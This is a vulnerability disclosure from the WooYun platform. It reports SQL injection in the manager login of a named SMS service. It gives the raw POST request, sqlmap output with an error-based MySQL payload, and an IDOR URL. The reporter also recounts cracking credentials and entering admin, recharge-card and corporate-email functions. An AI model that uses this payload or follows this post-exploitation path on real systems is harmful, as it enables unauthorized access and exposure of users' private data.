缺陷编号:WooYun-2015-0126702
漏洞标题:多打电话某系统SQL注入漏洞(可免费发送任意短信用于诈骗等附送后台越权/涉及N多用户隐私/另可生成充值卡/进入企业邮箱)
相关厂商:iddsms.com
漏洞作者:天地不仁 以万物为刍狗
提交时间:2015-07-14 14:40
公开时间:2015-07-19 14:42
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
2015-07-14: 细节已通知厂商并且等待厂商处理中
2015-07-14: 厂商已查看当前漏洞内容,细节仅向厂商公开
2015-07-19: 厂商已经主动忽略漏洞,细节向公众公开
天地本不仁万物为刍狗【HD】 以团队之名 以个人之荣耀 共建网络安全
POST数据包:
1 2 3 4 5 6 7 8 9 10 11 12 |
POST /managerlogin.jsp HTTP/1.1<br> Host: sms.iddsms.com<br> Content-Length: 49<br> Cache-Control: max-age=0<br> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br> Origin: http://sms.iddsms.com<br> User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.1.2238.18 Safari/537.36<br> Content-Type: application/x-www-form-urlencoded<br> Referer: http://sms.iddsms.com/managerlogin.jsp<br> Accept-Encoding: gzip, deflate<br> Accept-Language: zh-CN,zh;q=0.8<br> Cookie: JSESSIONID=EB7432D3B39E5A8AADFF7DE31F54460Adotype=check&loginuser=admin&loginpswd=admin&qq=+ |
参数 loginuser 可注入
看了下 websmss
虽然用户数量不是很多 也没跑了 跑了下 sys_user 的表(为进一步证明危害 勿怪)
随便解密了一个登陆了下
然后······看见短信管理中心···就给自己的手机发了条测试短信·····
越权:http://sms.iddsms.com/manager/base/tailmt.jsp?seqid=1262236修改ID可越权
其他的就不说了 下面我们进入 admin 这个账号 里面更劲爆哦
这里的用户管理与用户隐私 我就不说了 下面还可以充值卡生成与管理(因为涉及到钱 密码打了马赛克了)
邮箱的配置
密码就不用说了吧 很简单拿到手 进入企业邮箱
拿到企业邮箱后 可进行进一步的渗透 这里就不继续了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
sqlmap identified the following injection points with a total of 0 HTTP(s) reque<br> sts:<br> ---<br> Parameter: loginuser (POST)<br> Type: error-based<br> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl<br> ause<br> Payload: dotype=check&loginuser=admin' AND (SELECT 8829 FROM(SELECT COUNT(*)<br> ,CONCAT(0x7171716b71,(SELECT (ELT(8829=8829,1))),0x7170627071,FLOOR(RAND(0)*2))x<br> FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EbDl'='EbDl&loginpswd<br> =admin&qq=<br> ---<br> [13:27:35] [INFO] the back-end DBMS is MySQL<br> back-end DBMS: MySQL 5.0<br> [13:27:35] [INFO] fetching database names<br> [13:27:35] [INFO] the SQL query used returns 2 entries<br> [13:27:35] [INFO] resumed: information_schema<br> [13:27:35] [INFO] resumed: websmss<br> available databases [2]:<br> [*] information_schema<br> [*] websmss[13:27:35] [INFO] fetched data logged to text files under 'C:\Users\Administrato<br> r\.sqlmap\output\sms.iddsms.com'[*] shutting down at 13:27:35 |
危害等级:无影响厂商忽略
忽略时间:2015-07-1914:42
漏洞Rank:15 (WooYun评价)
暂无
标题太长了
嘎嘎
@大亮 最近流行长标题 所以 我也试试
你一天到晚都在POST
@0x 80 还说我···你不也一样嘛···
@天地不仁 以万物为刍狗 我哪里天天玩POST了,我很少发POST注入好不好
原文连接
的情况下转载,若非则不得使用我方内容。